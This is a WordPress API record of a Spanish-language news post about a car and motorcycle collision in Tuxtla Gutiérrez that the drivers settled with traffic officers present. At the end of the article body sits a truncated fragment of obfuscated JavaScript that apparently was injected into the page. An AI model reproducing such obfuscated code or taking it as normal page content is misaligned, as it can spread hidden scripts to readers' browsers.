{"id":20560,"date":"2025-02-24T06:30:43","date_gmt":"2025-02-24T06:30:43","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=20560"},"modified":"2025-02-24T06:30:44","modified_gmt":"2025-02-24T06:30:44","slug":"auto-y-motociclista-colisionan-en-el-barrio-hidalgo","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=20560","title":{"rendered":"Auto y motociclista colisionan en el Barrio Hidalgo"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"576\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/02\/IMG-20250224-WA0002-1024x576.jpg\" alt=\"\" class=\"wp-image-20561\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/02\/IMG-20250224-WA0002-1024x576.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/02\/IMG-20250224-WA0002-300x169.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/02\/IMG-20250224-WA0002-768x432.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/02\/IMG-20250224-WA0002-1536x864.jpg 1536w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/02\/IMG-20250224-WA0002.jpg 1600w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>Jairo Camacho.<\/p>\n\n\n\n<p>Agencia ReporteCiudano, 23 de febrero del 2025. Tuxtla Guti\u00e9rrez. &#8211; Este domingo un autom\u00f3vil Ford Fiesta de color esmeralda y una motocicleta Italika de color rojo con negro colisionaron a la altura de la 16 Oriente y 2a Norte.<\/p>\n\n\n\n<p>En el lugar se dio a conocer que, el autom\u00f3vil circulaba sobre la Avenida y no respet\u00f3 la via primaria e hizo corte de circulaci\u00f3n al conductor de la Italika.<\/p>\n\n\n\n<p>El conductor de la moto expuso que el auto pas\u00f3 sin precauci\u00f3n y ocasion\u00f3 la colisi\u00f3n.<\/p>\n\n\n\n<p>En el lugar los involucrados llegaron a un acuerdo armonioso del que los agentes de tr\u00e1nsito municipal tomaron datos.<\/p>\n\n\n\n<p>Finalmente ambos se retiraron del lugar.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>Jairo Camacho. Agencia ReporteCiudano, 23 de febrero del 2025. Tuxtla Guti\u00e9rrez. &#8211; Este domingo un autom\u00f3vil Ford Fiesta de color esmeralda y una motocicleta Italika de color rojo con negro colisionaron a la altura de la 16 Oriente y 2a Norte. En el lugar se dio a conocer que, el autom\u00f3vil circulaba sobre la Avenida &hellip;<\/p>\n","protected":false},"author":2,"featured_media":20561,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[4],"tags":[],"class_list":["post-20560","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-roja"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/20560","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=20560"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/20560\/revisions"}],"predecessor-version":[{"id":20562,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/20560\/revisions\/20562"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/20561"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=20560"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=20560"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=20560"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}